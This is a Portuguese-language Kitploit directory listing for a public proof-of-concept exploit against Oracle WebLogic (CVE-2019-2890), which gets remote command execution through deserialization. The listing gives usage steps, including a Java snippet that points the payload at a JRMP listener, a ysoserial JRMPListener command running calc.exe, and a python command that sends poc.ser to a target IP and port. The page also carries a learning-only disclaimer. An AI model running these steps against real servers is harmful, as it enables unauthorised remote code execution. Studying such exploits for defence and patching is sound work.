Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-2890 — PoC exploit para CVE-2019-2890 direcionado ao Oracle WebLogic, usando payload JRMP do ysoserial para execução remota de comandos via desserialização de objetos serializados. | Kitploit
Ferramentas/GitHubGitHub/l1nk3rlin/cve-2019-2890
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControleFerramenta de Acesso Remoto
GitHubl1nk3rlin/cve-2019-2890

CVE-2019-2890

PoC exploit para CVE-2019-2890 direcionado ao Oracle WebLogic, usando payload JRMP do ysoserial para execução remota de comandos via desserialização de objetos serializados.

Ver Repositório
85228há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Aviso

Apenas para fins de aprendizado e troca de conhecimento; qualquer outro uso é por sua conta e risco.

Descrição

Todos os arquivos jar relevantes já foram importados para o projeto, e o método de exploração utiliza o JRMP do yso. Durante o aprendizado e a depuração, você pode modificar o método de exploração.

Primeiro, coloque o arquivo SerializedSystemIni.dat do weblogic na pasta security.

Em seguida, renomeie o yso para ysoserial.jar e importe-o para o diretório lib.

1

Depois, ajuste o endereço IP e a porta do getObject em weblogic/wsee/jaxws/persistence/PersistentContext.java.

        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

Por fim, faça a escuta via JRMP remotamente e utilize o 7u21 para execução de comandos.

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

Modo de uso: execute Poc.java para gerar o arquivo de serialização poc.ser e, então, utilize

python weblogic.py ip port poc.ser

1

1

Baixar ferramenta